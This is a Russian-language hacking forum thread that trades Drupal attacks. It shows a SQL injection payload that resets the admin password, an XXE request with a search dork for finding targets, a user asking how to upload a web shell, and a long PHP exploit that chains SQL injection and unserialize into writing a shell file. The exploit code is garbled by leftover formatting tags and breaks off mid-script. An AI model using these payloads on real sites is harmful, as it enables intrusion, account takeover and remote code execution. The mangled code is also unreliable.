  15. Okt.  2014 - Relase of Bugfix by Drupal core Developers

poc:

Код:

name[0%20;update+users+set+name%3d'owned'+,+pass+%3d+'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld'+where+uid+%3d+'1';;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in
и работает ведь

вперед хэкеры

exploit:

http://pastebin.com/nDwLFV3v

video: http://www.youtube.com/watch?v=rHwJYD_yTlM

VY_CMa 16.01.2015 11:10

Drupal 7.34 Admin PHP Object Injection

https://websec.wordpress.com/2015/01...ect-injection/

VY_CMa 20.03.2015 18:49

Open redirect и обход авторизации. В плане эксплуатации имеются серьезные ограничения.

https://www.drupal.org/SA-CORE-2015-001

Байпас (modules/user/user.module)

До

PHP код:

[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]user_pass_rehash[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$timestamp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]) {

return[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$timestamp[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]);

}[/
COLOR][/COLOR

После

PHP код:

[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]user_pass_rehash[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$timestamp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$uid[/COLOR][COLOR="#007700"]) {

[/
COLOR][COLOR="#FF8000"]// Backwards compatibility: Try to determine a $uid if one was not passed.

// (Since $uid is a required parameter to this function, a PHP warning will

// be generated if it's not provided, which is an indication that the calling

// code should be updated. But the code below will try to generate a correct

// hash in the meantime.)

[/COLOR][COLOR="#007700"]if (!isset([/COLOR][COLOR="#0000BB"]$uid[/COLOR][COLOR="#007700"])) {

[/
COLOR][COLOR="#0000BB"]$uids[/COLOR][COLOR="#007700"]= array();

[/
COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]db_query_range[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT uid FROM {users} WHERE pass = '%s' AND login = '%s' AND uid > 0"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]);

while ([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]db_fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"])) {

[/
COLOR][COLOR="#0000BB"]$uids[/COLOR][COLOR="#007700"][] =[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'uid'[/COLOR][COLOR="#007700"]];

}

[/
COLOR][COLOR="#FF8000"]// If exactly one user account matches the provided password and login

// timestamp, proceed with that $uid.

[/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]count[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$uids[/COLOR][COLOR="#007700"]) ==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]) {

[/
COLOR][COLOR="#0000BB"]$uid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]reset[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$uids[/COLOR][COLOR="#007700"]);

}

[/
COLOR][COLOR="#FF8000"]// Otherwise there is no safe hash to return, so return a random string

// that will never be treated as a valid token.

[/COLOR][COLOR="#007700"]else {

return[/COLOR][COLOR="#0000BB"]drupal_random_key[/COLOR][COLOR="#007700"]();

}

}

return[/COLOR][COLOR="#0000BB"]drupal_hmac_base64[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$timestamp[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$uid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]drupal_get_private_key[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"]);

}

[/
COLOR][/COLOR

ORed (includes/bootstrap.inc)

PHP код:

[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]// Sanitize the destination parameter (which is often used for redirects)

// to prevent open redirect attacks leading to other domains. Sanitize

// both $_GET['destination'] and $_REQUEST['destination'] to protect code

// that relies on either, but do not sanitize $_POST to avoid interfering

// with unrelated form submissions. $_REQUEST['edit']['destination'] is

// also sanitized since drupal_goto() will sometimes rely on it, and

// other code might therefore use it too. The sanitization happens here

// because menu_path_is_external() requires the variable system to be

// available.

[/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'destination'[/COLOR][COLOR="#007700"]]) || isset([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'destination'[/COLOR][COLOR="#007700"]]) || isset([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'edit'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'destination'[/COLOR][COLOR="#007700"]])) {

require_once[/COLOR][COLOR="#DD0000"]'./includes/menu.inc'[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]drupal_load[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'module'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'filter'[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#FF8000"]// If the destination is an external URL, remove it.

[/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'destination'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]menu_path_is_external[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'destination'[/COLOR][COLOR="#007700"]])) {

unset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'destination'[/COLOR][COLOR="#007700"]]);

unset([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'destination'[/COLOR][COLOR="#007700"]]);

}

[/
COLOR][COLOR="#FF8000"]// If there's still something in $_REQUEST['destination'] that didn't

// come from $_GET, check it too.

[/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'destination'[/COLOR][COLOR="#007700"]]) && (!isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'destination'[/COLOR][COLOR="#007700"]]) ||[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'destination'[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'destination'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]menu_path_is_external[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'destination'[/COLOR][COLOR="#007700"]])) {

unset([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'destination'[/COLOR][COLOR="#007700"]]);

}

[/
COLOR][COLOR="#FF8000"]// Check $_REQUEST['edit']['destination'] separately.

[/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'edit'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'destination'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]menu_path_is_external[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'edit'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'destination'[/COLOR][COLOR="#007700"]])) {

unset([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'edit'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'destination'[/COLOR][COLOR="#007700"]]);

}

}[/COLOR][/COLOR


VY_CMa 27.04.2015 16:22

Pre-auth XXE in Drupal Services module, neat tricks to bypass restrictions inside

Подробное описание (PDF): http://www.synacktiv.fr/ressources/s...e_services.pdf

Код:

POST /drupal7.28/?q=test/node HTTP/1.1
[...]

%evil;
]>

        test

ДОРК: "inurl:sites/all/modules/services/servers/rest_server/"

embarg0 01.12.2015 19:11

Кто подскажет насчет 7,37 версии? может у когото есть сплоит?

GTAlex 01.11.2016 12:36

6.36 есть чем ковырнуть ?

vikler 10.02.2017 00:58

Всем привет

drupal 6.20. Аккаунт с правами администратора

Стандартные способы заливки шелла не помогают Кто что ещё подскажет?Что пробовала

1) В модулях включила PHP filter

2) По site/admin/settings/filters/ => Access denied You are not authorized to access this page.

А значит, уже не получится включить формат php, и соответственно при добавлении блоков или страниц нельзя выбрать формат php... Этот способ облом

3) Темы загружать не могу

4) есть imce. Загружаю php => переименовывается в php_.txt. Загружаю .php3 => скачивается

Загружаю .shtml - нормально открывается, но видна только html'ная часть, php код не исполняется, всё интерпретируется как html.

5) пыталась загрузить опять же через imce .htaccess чтобы не скачивались файлы php3. Но облом, переименовывается в htaccess.

В общем, не знаю, что ещё делать

Кто что подскажет?

Alexsize 09.03.2017 22:24

DRUPAL 7.X SERVICES MODULE UNSERIALIZE() TO RCE

Уязвимость

Одной из особенностей модуля является то, что можно управлять форматом ввода / вывода, изменяя заголовки Content-Type / Accept. По умолчанию разрешены следующие форматы ввода:

Application / xml

Application / json

Multipart / form-data

Application / vnd.php.serialized

Код:

POST /drupal-7.54/my_rest_endpoint/user/login HTTP/1.1
Host: vmweb.lan
Accept: application/json
Content-Type: application/vnd.php.serialized
Content-Length: 45
Connection: close

a:2:{s:8:"username";s:5:"admin";s:8:"password";s:8:"password";}

Код:

HTTP/1.1 200 OK
Date: Thu, 02 Mar 2017 14:29:54 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
X-Content-Type-Options: nosniff
Vary: Accept
Set-Cookie: SESSaad41d4de9fd30ccb65f8ea9e4162d52=ufBRP7UJFuQKSf0VuFvwaoB3h4mjVYXbE9K6Y_DGU_I; expires=Sat, 25-Mar-2017 18:03:14 GMT; Max-Age=2000000; path=/; domain=.vmweb.lan; HttpOnly
Content-Length: 635
Connection: close
Content-Type: application/json

{"sessid":"ufBRP7UJFuQKSf0VuFvwaoB3h4mjVYXbE9K6Y_DGU_I","session_name":"SESSaad41d4de9fd30ccb65f8ea9e4162d52","token":"2tFysvDt1POl7jjJJSCRO7sL1rvlrnqtrik6gljggo4","user":{"uid":"1","name":"admin","mail":"admin@vmweb.lan","theme":"","signature":"","signature_format":null,"created":"1487348324","access":"1488464867","login":1488464994,"status":"1","timezone":"Europe/Berlin","language":"","picture":null,"init":"admin@vmweb.lan","data":false,"roles":{"2":"authenticated user","3":"administrator"},"rdf_mapping":{"rdftype":["sioc:UserAccount"],"name":{"predicates":["foaf:name"]},"homepage":{"predicates":["foaf:page"],"type":"rel"}}}}



Exploit:

PHP код:

[COLOR="#000000"]#!/usr/bin/php
[COLOR="#0000BB"][/COLOR][COLOR="#DD0000"]'dixuSOspsOUU.php'[/COLOR][COLOR="#007700"],
[/
COLOR][COLOR="#DD0000"]'data'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]''
[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]$browser[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]Browser[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$endpoint_path[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#FF8000"]# Stage 1: SQL Injection

[/COLOR][COLOR="#007700"]class[/COLOR][COLOR="#0000BB"]DatabaseCondition
[/COLOR][COLOR="#007700"]{
protected[/COLOR][COLOR="#0000BB"]$conditions[/COLOR][COLOR="#007700"]= [
[/
COLOR][COLOR="#DD0000"]"#conjunction"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"AND"
[/COLOR][COLOR="#007700"]];
protected[/COLOR][COLOR="#0000BB"]$arguments[/COLOR][COLOR="#007700"]= [];
protected[/COLOR][COLOR="#0000BB"]$changed[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
protected[/COLOR][COLOR="#0000BB"]$queryPlaceholderIdentifier[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"];
public[/COLOR][COLOR="#0000BB"]$stringVersion[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"];

public function[/COLOR][COLOR="#0000BB"]__construct[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$stringVersion[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"])
{
[/
COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]stringVersion[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$stringVersion[/COLOR][COLOR="#007700"];

if(!isset([/COLOR][COLOR="#0000BB"]$stringVersion[/COLOR][COLOR="#007700"]))
{
[/
COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]changed[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];
[/
COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]stringVersion[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"];
}
}
}

class[/
COLOR][COLOR="#0000BB"]SelectQueryExtender[/COLOR][COLOR="#007700"]{
[/
COLOR][COLOR="#FF8000"]# Contains a DatabaseCondition object instead of a SelectQueryInterface
# so that $query->compile() exists and (string) $query is controlled by us.
[/COLOR][COLOR="#007700"]protected[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"];

protected[/COLOR][COLOR="#0000BB"]$uniqueIdentifier[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]QID[/COLOR][COLOR="#007700"];
protected[/COLOR][COLOR="#0000BB"]$connection[/COLOR][COLOR="#007700"];
protected[/COLOR][COLOR="#0000BB"]$placeholder[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];

public function[/COLOR][COLOR="#0000BB"]__construct[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"])
{
[/
COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]DatabaseCondition[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]);
}
}

[/
COLOR][COLOR="#0000BB"]$cache_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"services:[/COLOR][COLOR="#0000BB"]$endpoint[/COLOR][COLOR="#DD0000"]:resources"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$sql_cache[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT data FROM {cache} WHERE cid='[/COLOR][COLOR="#0000BB"]$cache_id[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$password_hash[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'$S$D2NH.6IZNb1vbZEV1F0S9fqIz3A0Y1xueKznB8vWrMsnV/nrTpnd'[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#FF8000"]# Take first user but with a custom password
# Store the original password hash in signature_format, and endpoint cache
# in signature
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=
[/
COLOR][COLOR="#DD0000"]"0x3a) UNION SELECT ux.uid AS uid, "[/COLOR][COLOR="#007700"].
[/
COLOR][COLOR="#DD0000"]"ux.name AS name, '[/COLOR][COLOR="#0000BB"]$password_hash[/COLOR][COLOR="#DD0000"]' AS pass, "[/COLOR][COLOR="#007700"].
[/COLOR][COLOR="#DD0000"]"ux.mail AS mail, ux.theme AS theme, ([/COLOR][COLOR="#0000BB"]$sql_cache[/COLOR][COLOR="#DD0000"]) AS signature, "[/COLOR][COLOR="#007700"].
[/COLOR][COLOR="#DD0000"]"ux.pass AS signature_format, ux.created AS created, "[/COLOR][COLOR="#007700"].
[/
COLOR][COLOR="#DD0000"]"ux.access AS access, ux.login AS login, ux.status AS status, "[/COLOR][COLOR="#007700"].
[/
COLOR][COLOR="#DD0000"]"ux.timezone AS timezone, ux.language AS language, ux.picture "[/COLOR][COLOR="#007700"].
[/
COLOR][COLOR="#DD0000"]"AS picture, ux.init AS init, ux.data AS data FROM {users} ux "[/COLOR][COLOR="#007700"].
[/
COLOR][COLOR="#DD0000"]"WHERE ux.uid<>(0"
[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]SelectQueryExtender[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);
[/
COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]= [[/COLOR][COLOR="#DD0000"]'username'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'password'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'ouvreboite'[/COLOR][COLOR="#007700"]];
[/
COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]serialize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]$json[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$browser[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]post[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]TYPE_PHP[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#FF8000"]# If this worked, the rest will as well
[/COLOR][COLOR="#007700"]if(!isset([/COLOR][COLOR="#0000BB"]$json[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]user[/COLOR][COLOR="#007700"]))
{
[/
COLOR][COLOR="#0000BB"]print_r[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$json[/COLOR][COLOR="#007700"]);
[/
COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Failed to login with fake password"[/COLOR][COLOR="#007700"]);
}

[/
COLOR][COLOR="#FF8000"]# Store session and user data

[/COLOR][COLOR="#0000BB"]$session[/COLOR][COLOR="#007700"]= [
[/
COLOR][COLOR="#DD0000"]'session_name'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$json[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]session_name[/COLOR][COLOR="#007700"],
[/
COLOR][COLOR="#DD0000"]'session_id'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$json[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]sessid[/COLOR][COLOR="#007700"],
[/
COLOR][COLOR="#DD0000"]'token'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$json[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]token
[/COLOR][COLOR="#007700"]];
[/
COLOR][COLOR="#0000BB"]store[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'session'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$session[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$json[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]user[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#FF8000"]# Unserialize the cached value
# Note: Drupal websites admins, this is your opportunity to fight back :)
[/COLOR][COLOR="#0000BB"]$cache[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]unserialize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]signature[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#FF8000"]# Reassign fields
[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]pass[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]signature_format[/COLOR][COLOR="#007700"];
unset([/
COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]signature[/COLOR][COLOR="#007700"]);
unset([/
COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]signature_format[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]store[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'user'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]);

if([/
COLOR][COLOR="#0000BB"]$cache[/COLOR][COLOR="#007700"]===[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"])
{
[/
COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Unable to obtains endpoint's cache value"[/COLOR][COLOR="#007700"]);
}

[/
COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Cache contains "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]sizeof[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$cache[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]" entries"[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#FF8000"]# Stage 2: Change endpoint's behaviour to write a shell

[/COLOR][COLOR="#007700"]class[/COLOR][COLOR="#0000BB"]DrupalCacheArray
[/COLOR][COLOR="#007700"]{
[/
COLOR][COLOR="#FF8000"]# Cache ID
[/COLOR][COLOR="#007700"]protected[/COLOR][COLOR="#0000BB"]$cid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"services:endpoint_name:resources"[/COLOR][COLOR="#007700"];
[/
COLOR][COLOR="#FF8000"]# Name of the table to fetch data from.
# Can also be used to SQL inject in DrupalDatabaseCache::getMultiple()
[/COLOR][COLOR="#007700"]protected[/COLOR][COLOR="#0000BB"]$bin[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'cache'[/COLOR][COLOR="#007700"];
protected[/COLOR][COLOR="#0000BB"]$keysToPersist[/COLOR][COLOR="#007700"]= [];
protected[/COLOR][COLOR="#0000BB"]$storage[/COLOR][COLOR="#007700"]= [];

function[/COLOR][COLOR="#0000BB"]__construct[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$storage[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$endpoint[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$controller[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]) {
[/
COLOR][COLOR="#0000BB"]$settings[/COLOR][COLOR="#007700"]= [
[/
COLOR][COLOR="#DD0000"]'services'[/COLOR][COLOR="#007700"]=> [[/COLOR][COLOR="#DD0000"]'resource_api_version'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'1.0'[/COLOR][COLOR="#007700"]]
];
[/
COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]cid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"services:[/COLOR][COLOR="#0000BB"]$endpoint[/COLOR][COLOR="#DD0000"]:resources"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#FF8000"]# If no endpoint is given, just reset the original values
[/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$controller[/COLOR][COLOR="#007700"]))
{
[/
COLOR][COLOR="#0000BB"]$storage[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$controller[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'actions'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]] = [
[/
COLOR][COLOR="#DD0000"]'help'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'Writes data to a file'[/COLOR][COLOR="#007700"],
[/
COLOR][COLOR="#FF8000"]# Callback function
[/COLOR][COLOR="#DD0000"]'callback'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'file_put_contents'[/COLOR][COLOR="#007700"],
[/
COLOR][COLOR="#FF8000"]# This one does not accept "true" as Drupal does,
# so we just go for a tautology
[/COLOR][COLOR="#DD0000"]'access callback'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'is_string'[/COLOR][COLOR="#007700"],
[/
COLOR][COLOR="#DD0000"]'access arguments'[/COLOR][COLOR="#007700"]=> [[/COLOR][COLOR="#DD0000"]'a string'[/COLOR][COLOR="#007700"]],
[/
COLOR][COLOR="#FF8000"]# Arguments given through POST
[/COLOR][COLOR="#DD0000"]'args'[/COLOR][COLOR="#007700"]=> [
[/
COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]=> [
[/
COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'filename'[/COLOR][COLOR="#007700"],
[/
COLOR][COLOR="#DD0000"]'type'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'string'[/COLOR][COLOR="#007700"],
[/
COLOR][COLOR="#DD0000"]'description'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'Path to the file'[/COLOR][COLOR="#007700"],
[/
COLOR][COLOR="#DD0000"]'source'[/COLOR][COLOR="#007700"]=> [[/COLOR][COLOR="#DD0000"]'data'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'filename'[/COLOR][COLOR="#007700"]],
[/
COLOR][COLOR="#DD0000"]'optional'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"],
],
[/
COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]=> [
[/
COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'data'[/COLOR][COLOR="#007700"],
[/
COLOR][COLOR="#DD0000"]'type'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'string'[/COLOR][COLOR="#007700"],
[/
COLOR][COLOR="#DD0000"]'description'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'The data to write'[/COLOR][COLOR="#007700"],
[/
